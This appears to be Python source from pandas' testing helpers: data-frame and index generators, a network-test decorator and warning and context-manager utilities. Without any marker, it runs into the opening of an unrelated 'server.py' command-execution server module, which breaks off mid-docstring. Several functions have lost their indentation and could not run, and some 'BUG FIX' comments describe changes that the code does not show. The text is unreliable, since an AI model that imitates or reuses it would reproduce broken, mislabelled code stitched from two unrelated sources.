    start = datetime(2000, 1, 1)
    return pd.period_range(start=start, periods=k, freq="B", name=name, **kwargs)
def makeMultiIndex(k=10, names=None, **kwargs):
    """Return a fixed 2x2 product MultiIndex.

    NOTE(review): *k* is accepted but never used — the result always has
    four entries; confirm whether any caller relies on passing k.
    """
    levels = (("foo", "bar"), (1, 2))
    return MultiIndex.from_product(levels, names=names, **kwargs)
# Pool of first names sampled by _make_timeseries() for its "name" column.
_names = [
    "Alice",
    "Bob",
    "Charlie",
    "Dan",
    "Edith",
    "Frank",
    "George",
    "Hannah",
    "Ingrid",
    "Jerry",
    "Kevin",
    "Laura",
    "Michael",
    "Norbert",
    "Oliver",
    "Patricia",
    "Quinn",
    "Ray",
    "Sarah",
    "Tim",
    "Ursula",
    "Victor",
    "Wendy",
    "Xavier",
    "Yvonne",
    "Zelda",
]
def _make_timeseries(start="2000-01-01", end="2000-12-31", freq="1D", seed=None):
    """
    Make a DataFrame with a DatetimeIndex
    Parameters
    ----------
    start : str or Timestamp, default "2000-01-01"
        The start of the index. Passed to date_range with `freq`.
    end : str or Timestamp, default "2000-12-31"
        The end of the index. Passed to date_range with `freq`.
    freq : str or Freq
        The frequency to use for the DatetimeIndex
    seed : int, optional
        The random state seed.
    Returns
    -------
    pd.DataFrame
        A DataFrame with the following columns:
    * name : object dtype with string names
    * id : int dtype with Poisson-distributed values
    * x, y : float dtype
    Examples
    --------
    >>> _make_timeseries()
                  id    name         x         y
    timestamp
    2000-01-01   982   Frank  0.031261  0.986727
    2000-01-02  1025   Edith -0.086358 -0.032920
    2000-01-03   982   Edith  0.473177  0.298654
    2000-01-04  1009   Sarah  0.534344 -0.750377
    2000-01-05   963   Zelda -0.271573  0.054424
    ...          ...     ...       ...       ...
    2000-12-27   980  Ingrid -0.132333 -0.422195
    2000-12-28   972   Frank -0.376007 -0.298687
    2000-12-29  1009  Ursula -0.865047 -0.503133
    2000-12-30  1000  Hannah -0.063757 -0.507336
    2000-12-31   972     Tim -0.869120  0.531685
    """
    index = pd.date_range(start=start, end=end, freq=freq, name="timestamp")
    n = len(index)
    state = np.random.RandomState(seed)
    columns = {
        "name": state.choice(_names, size=n),
        "id": state.poisson(1000, size=n),
        "x": state.rand(n) * 2 - 1,
        "y": state.rand(n) * 2 - 1,
    }
    df = pd.DataFrame(columns, index=index, columns=sorted(columns))
    # date_range is end-inclusive; drop the last row so `end` itself is excluded
    if df.index[-1] == end:
        df = df.iloc[:-1]
    return df
def index_subclass_makers_generator():
    """Yield the maker function for each Index subclass, in a fixed order."""
    yield from [
        makeDateIndex,
        makePeriodIndex,
        makeTimedeltaIndex,
        makeRangeIndex,
        makeIntervalIndex,
        makeCategoricalIndex,
        makeMultiIndex,
    ]
def all_timeseries_index_generator(k=10):
    """
    Generator which can be iterated over to get instances of all the classes
    which represent time-series.

    Parameters
    ----------
    k: length of each of the index instances
    """
    for maker in (makeDateIndex, makePeriodIndex, makeTimedeltaIndex):
        yield maker(k=k)
# make series
def makeFloatSeries(name=None):
    """Return a Series of _N random floats over a random-string index."""
    idx = makeStringIndex(_N)
    return Series(randn(_N), index=idx, name=name)
def makeStringSeries(name=None):
    """Return a Series of _N random floats indexed by random strings."""
    idx = makeStringIndex(_N)
    return Series(randn(_N), index=idx, name=name)
def makeObjectSeries(name=None):
    """Return a Series of random strings with object dtype."""
    # draw order matches the original: values first, then the index
    values = Index(makeStringIndex(_N), dtype=object)
    idx = makeStringIndex(_N)
    return Series(values, index=idx, name=name)
def getSeriesData():
    """Return a dict of _K random-float Series sharing one random-string index."""
    idx = makeStringIndex(_N)
    return {col: Series(randn(_N), index=idx) for col in getCols(_K)}
def makeTimeSeries(nper=None, freq="B", name=None):
    """Return a Series of random floats over a DatetimeIndex of *nper* periods."""
    nper = _N if nper is None else nper
    idx = makeDateIndex(nper, freq=freq)
    return Series(randn(nper), index=idx, name=name)
def makePeriodSeries(nper=None, name=None):
    """Return a Series of random floats over a PeriodIndex of *nper* periods."""
    nper = _N if nper is None else nper
    idx = makePeriodIndex(nper)
    return Series(randn(nper), index=idx, name=name)
def getTimeSeriesData(nper=None, freq="B"):
    """Return a dict mapping column letters to random time Series."""
    return {col: makeTimeSeries(nper, freq) for col in getCols(_K)}
def getPeriodData(nper=None):
    """Return a dict mapping column letters to random period Series."""
    return {col: makePeriodSeries(nper) for col in getCols(_K)}
# make frame
def makeTimeDataFrame(nper=None, freq="B"):
    """Return a DataFrame of random floats over a DatetimeIndex."""
    return DataFrame(getTimeSeriesData(nper, freq))
def makeDataFrame():
    """Return a DataFrame of random floats over a random-string index."""
    return DataFrame(getSeriesData())
def getMixedTypeDict():
    """Return (index, data) for a small frame with float/str/datetime columns."""
    idx = Index(["a", "b", "c", "d", "e"])
    data = {
        "A": [0.0, 1.0, 2.0, 3.0, 4.0],
        "B": [0.0, 1.0, 0.0, 1.0, 0.0],
        "C": ["foo1", "foo2", "foo3", "foo4", "foo5"],
        "D": bdate_range("1/1/2009", periods=5),
    }
    return idx, data
def makeMixedDataFrame():
    """Return a mixed-dtype DataFrame built from getMixedTypeDict()'s data."""
    _, data = getMixedTypeDict()
    return DataFrame(data)
def makePeriodFrame(nper=None):
    """Return a DataFrame of random floats over a PeriodIndex."""
    return DataFrame(getPeriodData(nper))
def makeCustomIndex(
    nentries, nlevels, prefix="#", names=False, ndupe_l=None, idx_type=None
):
    """
    Create an index/multindex with given dimensions, levels, names, etc'
    nentries - number of entries in index
    nlevels - number of levels (> 1 produces multindex)
    prefix - a string prefix for labels
    names - (Optional), bool or list of strings. if True will use default
       names, if false will use no names, if a list is given, the name of
       each level in the index will be taken from the list.
    ndupe_l - (Optional), list of ints, the number of rows for which the
       label will repeated at the corresponding level, you can specify just
       the first few, the rest will use the default ndupe_l of 1.
       len(ndupe_l) <= nlevels.
    idx_type - "i"/"f"/"s"/"u"/"dt"/"p"/"td".
       If idx_type is not None, `idx_nlevels` must be 1.
       "i"/"f" creates an integer/float index,
       "s"/"u" creates a string/unicode index
       "dt" create a datetime index.
       "td" create a timedelta index.
       if unspecified, string labels will be generated.
    """
    if ndupe_l is None:
        ndupe_l = [1] * nlevels
    assert is_sequence(ndupe_l) and len(ndupe_l) <= nlevels
    # BUG FIX: compare ints with ==, not identity (`is`), which only works
    # by accident for small interned ints.
    assert names is None or names is False or names is True or len(names) == nlevels
    assert idx_type is None or (
        idx_type in ("i", "f", "s", "u", "dt", "p", "td") and nlevels == 1
    )
    if names is True:
        # build default names
        names = [prefix + str(i) for i in range(nlevels)]
    if names is False:
        # pass None to index constructor for no name
        names = None
    # make singleton case uniform
    if isinstance(names, str) and nlevels == 1:
        names = [names]
    # specific 1D index type requested?
    idx_func = dict(
        i=makeIntIndex,
        f=makeFloatIndex,
        s=makeStringIndex,
        u=makeUnicodeIndex,
        dt=makeDateIndex,
        td=makeTimedeltaIndex,
        p=makePeriodIndex,
    ).get(idx_type)
    if idx_func:
        idx = idx_func(nentries)
        # but we need to fill in the name
        if names:
            idx.name = names[0]
        return idx
    elif idx_type is not None:
        raise ValueError(
            f"{repr(idx_type)} is not a legal value for `idx_type`, "
            "use 'i'/'f'/'s'/'u'/'dt'/'p'/'td'."
        )
    if len(ndupe_l) < nlevels:
        # pad unspecified levels with the default multiplicity of 1
        ndupe_l.extend([1] * (nlevels - len(ndupe_l)))
    assert len(ndupe_l) == nlevels
    assert all(x > 0 for x in ndupe_l)
    tuples = []
    for i in range(nlevels):

        def keyfunc(x):
            # sort labels numerically by the digits embedded in "{prefix}_lX_gY"
            import re

            numeric_tuple = re.sub(r"[^\d_]_?", "", x).split("_")
            return [int(num) for num in numeric_tuple]

        # build a list of lists to create the index from
        div_factor = nentries // ndupe_l[i] + 1
        cnt = Counter()
        for j in range(div_factor):
            label = f"{prefix}_l{i}_g{j}"
            cnt[label] = ndupe_l[i]
        # cute Counter trick
        result = sorted(cnt.elements(), key=keyfunc)[:nentries]
        tuples.append(result)
    tuples = list(zip(*tuples))
    # convert tuples to index
    if nentries == 1:
        # we have a single level of tuples, i.e. a regular Index
        index = Index(tuples[0], name=names[0])
    elif nlevels == 1:
        name = None if names is None else names[0]
        index = Index((x[0] for x in tuples), name=name)
    else:
        index = MultiIndex.from_tuples(tuples, names=names)
    return index
def makeCustomDataframe(
    nrows,
    ncols,
    c_idx_names=True,
    r_idx_names=True,
    c_idx_nlevels=1,
    r_idx_nlevels=1,
    data_gen_f=None,
    c_ndupe_l=None,
    r_ndupe_l=None,
    dtype=None,
    c_idx_type=None,
    r_idx_type=None,
):
    """
    Create a DataFrame using supplied parameters.
    Parameters
    ----------
    nrows, ncols - number of data rows/cols
    c_idx_names, idx_names - False/True/list of strings, yields No names ,
       default names or uses the provided names for the levels of the
       corresponding index. You can provide a single string when
       c_idx_nlevels ==1.
    c_idx_nlevels - number of levels in columns index. > 1 will yield MultiIndex
    r_idx_nlevels - number of levels in rows index. > 1 will yield MultiIndex
    data_gen_f - a function f(row,col) which return the data value
       at that position, the default generator used yields values of the form
       "RxCy" based on position.
    c_ndupe_l, r_ndupe_l - list of integers, determines the number
       of duplicates for each label at a given level of the corresponding
       index. The default `None` value produces a multiplicity of 1 across
       all levels, i.e. a unique index. Will accept a partial list of length
       N < idx_nlevels, for just the first N levels. If ndupe doesn't divide
       nrows/ncol, the last label might have lower multiplicity.
    dtype - passed to the DataFrame constructor as is, in case you wish to
       have more control in conjunction with a custom `data_gen_f`
    r_idx_type, c_idx_type - "i"/"f"/"s"/"u"/"dt"/"td".
       If idx_type is not None, `idx_nlevels` must be 1.
       "i"/"f" creates an integer/float index,
       "s"/"u" creates a string/unicode index
       "dt" create a datetime index.
       "td" create a timedelta index.
       if unspecified, string labels will be generated.
    Examples
    --------
    # 5 row, 3 columns, default names on both, single index on both axis
    >> makeCustomDataframe(5,3)
    # make the data a random int between 1 and 100
    >> mkdf(5,3,data_gen_f=lambda r,c:randint(1,100))
    # 2-level multiindex on rows with each label duplicated
    # twice on first level, default names on both axis, single
    # index on both axis
    >> a=makeCustomDataframe(5,3,r_idx_nlevels=2,r_ndupe_l=[2])
    # DatetimeIndex on row, index with unicode labels on columns
    # no names on either axis
    >> a=makeCustomDataframe(5,3,c_idx_names=False,r_idx_names=False,
                             r_idx_type="dt",c_idx_type="u")
    # 4-level multindex on rows with names provided, 2-level multindex
    # on columns with default labels and default names.
    >> a=makeCustomDataframe(5,3,r_idx_nlevels=4,
                             r_idx_names=["FEE","FI","FO","FAM"],
                             c_idx_nlevels=2)
    >> a=mkdf(5,3,r_idx_nlevels=2,c_idx_nlevels=4)
    """
    # validate arguments before delegating to makeCustomIndex
    assert c_idx_nlevels > 0
    assert r_idx_nlevels > 0
    assert r_idx_type is None or (
        r_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and r_idx_nlevels == 1
    )
    assert c_idx_type is None or (
        c_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and c_idx_nlevels == 1
    )
    # build the two axes with makeCustomIndex ("C"/"R" label prefixes)
    columns = makeCustomIndex(
        ncols,
        nlevels=c_idx_nlevels,
        prefix="C",
        names=c_idx_names,
        ndupe_l=c_ndupe_l,
        idx_type=c_idx_type,
    )
    index = makeCustomIndex(
        nrows,
        nlevels=r_idx_nlevels,
        prefix="R",
        names=r_idx_names,
        ndupe_l=r_ndupe_l,
        idx_type=r_idx_type,
    )
    # by default, generate data based on location
    if data_gen_f is None:
        data_gen_f = lambda r, c: f"R{r}C{c}"
    data = [[data_gen_f(r, c) for c in range(ncols)] for r in range(nrows)]
    return DataFrame(data, index, columns, dtype=dtype)
def _create_missing_idx(nrows, ncols, density, random_state=None):
if random_state is None:
random_state = np.random
else:
random_state = np.random.RandomState(random_state)
# below is cribbed from scipy.sparse
size = int(np.round((1 - density) * nrows * ncols))
# generate a few more to ensure unique values
min_rows = 5
fac = 1.02
extra_size = min(size + min_rows, fac * size)
def _gen_unique_rand(rng, _extra_size):
ind = rng.rand(int(_extra_size))
return np.unique(np.floor(ind * nrows * ncols))[:size]
ind = _gen_unique_rand(random_state, extra_size)
while ind.size < size:
extra_size *= 1.05
ind = _gen_unique_rand(random_state, extra_size)
j = np.floor(ind * 1.0 / nrows).astype(int)
i = (ind - j * nrows).astype(int)
return i.tolist(), j.tolist()
def makeMissingDataframe(density=0.9, random_state=None):
    """Return a random DataFrame with ~(1 - density) of its cells set to NaN."""
    frame = makeDataFrame()
    rows, cols = _create_missing_idx(
        *frame.shape, density=density, random_state=random_state
    )
    frame.values[rows, cols] = np.nan
    return frame
def optional_args(decorator):
    """
    Allow a decorator to accept optional positional and keyword arguments.

    A single, callable, positional argument is taken to mean the wrapped
    decorator is being applied directly to a function, i.e.::
        @my_decorator
        def function(): pass
    In that case the decorator is invoked immediately; otherwise a
    parameterized decorator is returned. Calls decorator with
    decorator(f, *args, **kwargs).
    """

    @wraps(decorator)
    def wrapper(*args, **kwargs):
        def dec(f):
            return decorator(f, *args, **kwargs)

        # bare-decorator usage: one callable positional arg, no keywords
        if not kwargs and len(args) == 1 and callable(args[0]):
            func = args[0]
            # rebind args so the closure in `dec` sees no extra positionals
            args = []
            return dec(func)
        return dec

    return wrapper
# skip tests on exceptions with this message
# (matched as substrings of str(exc) when deciding to skip a network test)
_network_error_messages = (
    # 'urlopen error timed out',
    # 'timeout: timed out',
    # 'socket.timeout: timed out',
    "timed out",
    "Server Hangup",
    "HTTP Error 503: Service Unavailable",
    "502: Proxy Error",
    "HTTP Error 502: internal error",
    "HTTP Error 502",
    "HTTP Error 503",
    "HTTP Error 403",
    "HTTP Error 400",
    "Temporary failure in name resolution",
    "Name or service not known",
    "Connection refused",
    "certificate verify",
)
# or this e.errno/e.reason.errno
# (errno values treated as "no network", also causing a skip)
_network_errno_vals = (
    101, # Network is unreachable
    111, # Connection refused
    110, # Connection timed out
    104, # Connection reset Error
    54, # Connection reset by peer
    60, # urllib.error.URLError: [Errno 60] Connection timed out
)
# Both of the above shouldn't mask real issues such as 404's
# or refused connections (changed DNS).
# But some tests (test_data yahoo) contact incredibly flakey
# servers.
# and conditionally raise on exception types in _get_default_network_errors
def _get_default_network_errors():
# Lazy import for http.client because it imports many things from the stdlib
import http.client
return (IOError, http.client.HTTPException, TimeoutError)
def can_connect(url, error_classes=None):
    """
    Try to connect to the given url. True if succeeds, False if IOError
    raised

    Parameters
    ----------
    url : basestring
        The URL to try to connect to
    error_classes : tuple or Exception, optional
        Exception classes treated as "cannot connect"; defaults to
        _get_default_network_errors().

    Returns
    -------
    connectable : bool
        Return True if no IOError (unable to connect) or URLError (bad url) was
        raised
    """
    errors = _get_default_network_errors() if error_classes is None else error_classes
    try:
        with urlopen(url):
            pass
    except errors:
        return False
    return True
@optional_args
def network(
    t,
    url="http://www.google.com",
    raise_on_error=_RAISE_NETWORK_ERROR_DEFAULT,
    check_before_test=False,
    error_classes=None,
    skip_errnos=_network_errno_vals,
    _skip_on_messages=_network_error_messages,
):
    """
    Label a test as requiring network connection and, if an error is
    encountered, only raise if it does not find a network connection.

    In comparison to ``network``, this assumes an added contract to your test:
    you must assert that, under normal conditions, your test will ONLY fail if
    it does not have network connectivity.

    You can call this in 3 ways: as a standard decorator, with keyword
    arguments, or with a positional argument that is the url to check.

    Parameters
    ----------
    t : callable
        The test requiring network connectivity.
    url : path
        The url to test via ``pandas.io.common.urlopen`` to check
        for connectivity. Defaults to 'http://www.google.com'.
    raise_on_error : bool
        If True, never catches errors.
    check_before_test : bool
        If True, checks connectivity before running the test case.
    error_classes : tuple or Exception
        error classes to ignore. If not in ``error_classes``, raises the error.
        defaults to IOError. Be careful about changing the error classes here.
    skip_errnos : iterable of int
        Any exception that has .errno or .reason.errno set to one
        of these values will be skipped with an appropriate
        message.
    _skip_on_messages: iterable of string
        any exception e for which one of the strings is
        a substring of str(e) will be skipped with an appropriate
        message. Intended to suppress errors where an errno isn't available.

    Notes
    -----
    * ``raise_on_error`` supersedes ``check_before_test``

    Returns
    -------
    t : callable
        The decorated test ``t``, with checks for connectivity errors.

    Example
    -------

    Tests decorated with @network will fail if it's possible to make a network
    connection to another URL (defaults to google.com)::

      >>> from pandas._testing import network
      >>> from pandas.io.common import urlopen
      >>> @network
      ... def test_network():
      ...     with urlopen("rabbit://bonanza.com"):
      ...         pass
      Traceback
         ...
      URLError: <urlopen error unknown url type: rabit>

      You can specify alternative URLs::

        >>> @network("http://www.yahoo.com")
        ... def test_something_with_yahoo():
        ...     raise IOError("Failure Message")
        >>> test_something_with_yahoo()
        Traceback (most recent call last):
            ...
        IOError: Failure Message

    If you set check_before_test, it will check the url first and not run the
    test on failure::

        >>> @network("failing://url.blaher", check_before_test=True)
        ... def test_something():
        ...     print("I ran!")
        ...     raise ValueError("Failure")
        >>> test_something()
        Traceback (most recent call last):
            ...

    Errors not related to networking will always be raised.
    """
    from pytest import skip

    if error_classes is None:
        error_classes = _get_default_network_errors()

    # Mark the test so e.g. test collection can select/deselect network tests.
    t.network = True

    @wraps(t)
    def wrapper(*args, **kwargs):
        if check_before_test and not raise_on_error:
            if not can_connect(url, error_classes):
                skip()
        try:
            return t(*args, **kwargs)
        except Exception as err:
            errno = getattr(err, "errno", None)
            # BUG FIX: previously this probed ``errno`` (an int or None) for a
            # ``reason`` attribute, which never exists, so the errno wrapped
            # inside a URLError.reason was never extracted.  Probe the
            # exception object itself instead.
            if not errno and hasattr(err, "reason"):
                errno = getattr(err.reason, "errno", None)

            if errno in skip_errnos:
                skip(f"Skipping test due to known errno and error {err}")

            e_str = str(err)

            if any(m.lower() in e_str.lower() for m in _skip_on_messages):
                skip(
                    f"Skipping test because exception message is known and error {err}"
                )

            # Unknown exception types are genuine failures, re-raise them.
            if not isinstance(err, error_classes):
                raise

            # Only swallow a network error when we genuinely have no
            # connectivity; otherwise the test found a real problem.
            if raise_on_error or can_connect(url, error_classes):
                raise
            else:
                skip(f"Skipping test due to lack of connectivity and error {err}")

    return wrapper
# Backwards-compatible alias for the ``network`` decorator.
with_connectivity_check = network
@contextmanager
def assert_produces_warning(
    expected_warning=Warning,
    filter_level="always",
    check_stacklevel=True,
    raise_on_extra_warnings=True,
):
    """
    Context manager for running code expected to either raise a specific
    warning, or not raise any warnings. Verifies that the code raises the
    expected warning, and that it does not raise any other unexpected
    warnings. It is basically a wrapper around ``warnings.catch_warnings``.

    Parameters
    ----------
    expected_warning : {Warning, False, None}, default Warning
        The type of Exception raised. ``exception.Warning`` is the base
        class for all warnings. To check that no warning is returned,
        specify ``False`` or ``None``.
    filter_level : str or None, default "always"
        Specifies whether warnings are ignored, displayed, or turned
        into errors.
        Valid values are:

        * "error" - turns matching warnings into exceptions
        * "ignore" - discard the warning
        * "always" - always emit a warning
        * "default" - print the warning the first time it is generated
          from each location
        * "module" - print the warning the first time it is generated
          from each module
        * "once" - print the warning the first time it is generated

    check_stacklevel : bool, default True
        If True, displays the line that called the function containing
        the warning to show were the function is called. Otherwise, the
        line that implements the function is displayed.
    raise_on_extra_warnings : bool, default True
        Whether extra warnings not of the type `expected_warning` should
        cause the test to fail.

    Examples
    --------
    >>> import warnings
    >>> with assert_produces_warning():
    ...     warnings.warn(UserWarning())
    ...
    >>> with assert_produces_warning(False):
    ...     warnings.warn(RuntimeWarning())
    ...
    Traceback (most recent call last):
        ...
    AssertionError: Caused unexpected warning(s): ['RuntimeWarning'].
    >>> with assert_produces_warning(UserWarning):
    ...     warnings.warn(RuntimeWarning())
    Traceback (most recent call last):
        ...
    AssertionError: Did not see expected warning of class 'UserWarning'.

    ..warn:: This is *not* thread-safe.
    """
    __tracebackhide__ = True

    with warnings.catch_warnings(record=True) as w:
        saw_warning = False
        warnings.simplefilter(filter_level)
        # Run the caller's block; all warnings it emits are recorded in ``w``.
        yield w
        # After the block finishes, classify each recorded warning as either
        # the expected one or an "extra" warning.
        extra_warnings = []

        for actual_warning in w:
            if expected_warning and issubclass(
                actual_warning.category, expected_warning
            ):
                saw_warning = True

                if check_stacklevel and issubclass(
                    actual_warning.category, (FutureWarning, DeprecationWarning)
                ):
                    from inspect import getframeinfo, stack

                    # stack()[2] is the caller of this context manager; a
                    # correctly-set stacklevel makes the warning point there.
                    caller = getframeinfo(stack()[2][0])
                    msg = (
                        "Warning not set with correct stacklevel. "
                        f"File where warning is raised: {actual_warning.filename} != "
                        f"{caller.filename}. Warning message: {actual_warning.message}"
                    )
                    assert actual_warning.filename == caller.filename, msg
            else:
                extra_warnings.append(
                    (
                        actual_warning.category.__name__,
                        actual_warning.message,
                        actual_warning.filename,
                        actual_warning.lineno,
                    )
                )

        if expected_warning:
            msg = (
                f"Did not see expected warning of class "
                f"{repr(expected_warning.__name__)}"
            )
            assert saw_warning, msg
        if raise_on_extra_warnings and extra_warnings:
            raise AssertionError(
                f"Caused unexpected warning(s): {repr(extra_warnings)}"
            )
class RNGContext:
    """
    Context manager to set the numpy random number generator speed. Returns
    to the original value upon exiting the context manager.

    Parameters
    ----------
    seed : int
        Seed for numpy.random.seed

    Examples
    --------
    with RNGContext(42):
        np.random.randn()
    """

    def __init__(self, seed):
        # The RNG is only touched on __enter__/__exit__, not here.
        self.seed = seed

    def __enter__(self):
        # Snapshot the global generator state so it can be fully restored.
        self.start_state = np.random.get_state()
        np.random.seed(self.seed)

    def __exit__(self, exc_type, exc_value, traceback):
        # Restore the pre-context state even when the block raised.
        np.random.set_state(self.start_state)
@contextmanager
def with_csv_dialect(name, **kwargs):
    """
    Context manager to temporarily register a CSV dialect for parsing CSV.

    Parameters
    ----------
    name : str
        The name of the dialect.
    kwargs : mapping
        The parameters for the dialect.

    Raises
    ------
    ValueError : the name of the dialect conflicts with a builtin one.

    See Also
    --------
    csv : Python's CSV library.
    """
    import csv

    _BUILTIN_DIALECTS = {"excel", "excel-tab", "unix"}

    if name in _BUILTIN_DIALECTS:
        raise ValueError("Cannot override builtin dialect.")

    csv.register_dialect(name, **kwargs)
    # BUG FIX: unregister in a finally block so an exception raised inside
    # the ``with`` body cannot leak the temporary dialect into later tests.
    try:
        yield
    finally:
        csv.unregister_dialect(name)
@contextmanager
def use_numexpr(use, min_elements=None):
    """
    Context manager to temporarily toggle numexpr-based evaluation in pandas.

    Parameters
    ----------
    use : bool
        Whether pandas expression evaluation should use numexpr.
    min_elements : int, optional
        Temporary value for ``expressions._MIN_ELEMENTS`` (the array size
        threshold above which numexpr is used); defaults to the current
        setting.
    """
    from pandas.core.computation import expressions as expr

    if min_elements is None:
        min_elements = expr._MIN_ELEMENTS

    olduse = expr._USE_NUMEXPR
    oldmin = expr._MIN_ELEMENTS
    expr.set_use_numexpr(use)
    expr._MIN_ELEMENTS = min_elements
    # BUG FIX: restore the previous configuration in a finally block so an
    # exception raised inside the ``with`` body cannot leak the modified
    # global settings into later tests.
    try:
        yield
    finally:
        expr._MIN_ELEMENTS = oldmin
        expr.set_use_numexpr(olduse)
def test_parallel(num_threads=2, kwargs_list=None):
    """
    Decorator to run the same function multiple times in parallel.

    Parameters
    ----------
    num_threads : int, optional
        The number of times the function is run in parallel.
    kwargs_list : list of dicts, optional
        Per-thread keyword-argument overrides merged into the kwargs of the
        original call; must have exactly ``num_threads`` entries.

    Notes
    -----
    This decorator does not pass the return value of the decorated function.

    Original from scikit-image:

    https://github.com/scikit-image/scikit-image/pull/1519
    """
    assert num_threads > 0
    if kwargs_list is not None:
        assert len(kwargs_list) == num_threads

    import threading

    def wrapper(func):
        @wraps(func)
        def inner(*args, **kwargs):
            # One kwargs dict per thread: either the caller's kwargs as-is,
            # or the caller's kwargs updated with the per-thread overrides.
            if kwargs_list is None:
                per_thread_kwargs = [kwargs] * num_threads
            else:
                per_thread_kwargs = [dict(kwargs, **extra) for extra in kwargs_list]

            workers = [
                threading.Thread(target=func, args=args, kwargs=kw)
                for kw in per_thread_kwargs
            ]
            for worker in workers:
                worker.start()
            for worker in workers:
                worker.join()

        return inner

    return wrapper
class SubclassedSeries(Series):
    # Series subclass used in tests to verify that custom metadata
    # ("testattr", plus the built-in "name") propagates through operations.
    _metadata = ["testattr", "name"]

    @property
    def _constructor(self):
        # Operations returning a Series stay in this subclass.
        return SubclassedSeries

    @property
    def _constructor_expanddim(self):
        # Dimension-expanding operations (e.g. to_frame) return the
        # matching DataFrame subclass.
        return SubclassedDataFrame
class SubclassedDataFrame(DataFrame):
    # DataFrame subclass used in tests to verify that custom metadata
    # ("testattr") propagates through operations.
    _metadata = ["testattr"]

    @property
    def _constructor(self):
        # Operations returning a DataFrame stay in this subclass.
        return SubclassedDataFrame

    @property
    def _constructor_sliced(self):
        # Row/column slicing returns the matching Series subclass.
        return SubclassedSeries
class SubclassedCategorical(Categorical):
    # Categorical subclass used in tests to verify subclass preservation.
    @property
    def _constructor(self):
        return SubclassedCategorical
@contextmanager
def set_timezone(tz: str):
    """
    Context manager for temporarily setting a timezone.

    Parameters
    ----------
    tz : str
        A string representing a valid timezone.

    Examples
    --------
    >>> from datetime import datetime
    >>> from dateutil.tz import tzlocal
    >>> tzlocal().tzname(datetime.now())
    'IST'

    >>> with set_timezone('US/Eastern'):
    ...     tzlocal().tzname(datetime.now())
    ...
    'EDT'
    """
    import os
    import time

    def _apply(zone):
        # ``None`` means "TZ was unset": remove the variable if present.
        if zone is None:
            os.environ.pop("TZ", None)
        else:
            os.environ["TZ"] = zone
        # Make the C library re-read the TZ environment variable.
        time.tzset()

    previous = os.environ.get("TZ")
    _apply(tz)
    try:
        yield
    finally:
        _apply(previous)
def _make_skipna_wrapper(alternative, skipna_alternative=None):
"""
Create a function for calling on an array.
Parameters
----------
alternative : function
The function to be called on the array with no NaNs.
Only used when 'skipna_alternative' is None.
skipna_alternative : function
The function to be called on the original array
Returns
-------
function
"""
if skipna_alternative:
def skipna_wrapper(x):
return skipna_alternative(x.values)
else:
def skipna_wrapper(x):
nona = x.dropna()
if len(nona) == 0:
return np.nan
return alternative(nona)
return skipna_wrapper
def convert_rows_list_to_csv_str(rows_list: List[str]):
    """
    Convert list of CSV rows to single CSV-formatted string for current OS.

    This method is used for creating expected value of to_csv() method.

    Parameters
    ----------
    rows_list : List[str]
        Each element represents the row of csv.

    Returns
    -------
    str
        Expected output of to_csv() in current OS.
    """
    terminator = os.linesep
    # Rows are joined with, and the whole string is terminated by, the
    # OS line separator (an empty list still yields one terminator).
    return terminator.join(rows_list) + terminator
def external_error_raised(expected_exception: Type[Exception]) -> ContextManager:
    """
    Helper function to mark pytest.raises that have an external error message.

    Parameters
    ----------
    expected_exception : Exception
        Expected error to raise.

    Returns
    -------
    Callable
        Regular `pytest.raises` function with `match` equal to `None`.
    """
    # Imported lazily so merely importing this module does not need pytest.
    import pytest

    # match=None documents that the message comes from an external library
    # and is deliberately not asserted on.
    return pytest.raises(expected_exception, match=None)
# (function, cython-name) pairs from pandas' SelectionMixin, used by
# get_cython_table_params to expand a method name into all the callables
# that map to the same cython implementation.
cython_table = pd.core.base.SelectionMixin._cython_table.items()
def get_cython_table_params(ndframe, func_names_and_expected):
    """
    Combine frame, functions from SelectionMixin._cython_table
    keys and expected result.

    Parameters
    ----------
    ndframe : DataFrame or Series
    func_names_and_expected : Sequence of two items
        The first item is a name of a NDFrame method ('sum', 'prod') etc.
        The second item is the expected return value.

    Returns
    -------
    list
        List of three items (DataFrame, function, expected result)
    """
    params = []
    for name, expected in func_names_and_expected:
        # The method name itself is one parameter set ...
        params.append((ndframe, name, expected))
        # ... plus every cython-table callable registered under that name.
        for func, cython_name in cython_table:
            if cython_name == name:
                params.append((ndframe, func, expected))
    return params
def get_op_from_name(op_name: str) -> Callable:
"""
The operator function for a given op name.
Parameters
----------
op_name : string
The op name, in form of "add" or "__add__".
Returns
-------
function
A function performing the operation.
"""
short_opname = op_name.strip("_")
try:
op = getattr(operator, short_opname)
except AttributeError:
# Assume it is the reverse operator
rop = getattr(operator, short_opname[1:])
op = lambda x, y: rop(y, x)
return op
|
server.py | """
Command execution server process.
| Server process | | forkserver |
client server
run -------
client -> server
To allow use of any callable in the server we override the forkserver
implementation and do not
"""
from __future__ import annotations
import contextvars
import functools
import json
import logging
import multiprocessing
import os
import signal
import socket
import sys
import time
import traceback
from abc import ABC, abstractmethod
from contextlib import ExitStack
from ._asyncio import DeadlineTimer
from ._imports import asyncio
from ._logging import ContextLogger
from ._multiprocessing import run_in_process
from ._multiprocessing_asyncio import (
AsyncConnectionAdapter,
AsyncListener,
AsyncProcess,
ConnectionClose,
ListenerStopped,
)
from ._typing import MYPY_CHECK_RUNNING
from ._signal import settable_signals
from .constants import socket_name, stop_socket_name, server_state_name
from .protocol import ProcessState, Request, RequestTypes, Response
from .xdg import RuntimeDir
from .. import __version__
if MYPY_CHECK_RUNNING:
from typing import Any, Dict, Optional
from ._types import NoneFunction
logger = ContextLogger(logging.getLogger(__name__), prefix="server_")
def run(
    socket_handler,
    runtime_dir: RuntimeDir,
    server_idle_timeout: Optional[float],
    user_data: Optional[Any],
):
    """Start the server in the background.

    The function returns only when the server has successfully started.

    Args:
        socket_handler: function invoked on each request
        runtime_dir: directory for holding socket/pid file and used as the
            working directory for the server
        server_idle_timeout: timeout after which server will shutdown if no
            active requests
        user_data: JSON-serializable object put into server metadata file

    Raises:
        If there are any issues starting the server errors are re-raised.
    """
    logger.debug("Starting server launcher")

    # Relative files must be created in the context of the actual runtime
    # dir, not whatever path happens to exist at daemonization time.
    options = {"working_directory": runtime_dir.fileno()}
    server_main = functools.partial(
        _run_server, socket_handler, server_idle_timeout, user_data
    )
    return run_in_process(daemonize, args=(server_main, options), allow_detach=True)
def daemonize(detach, target, daemon_options: Dict):
    """Finish turning the current (already re-parented) process into a daemon,
    then invoke ``target(detach)``.

    Args:
        detach: opaque handle passed through to ``target``
            (presumably supplied by run_in_process(allow_detach=True) —
            TODO confirm against _multiprocessing.run_in_process)
        target: function to run once daemonization is complete
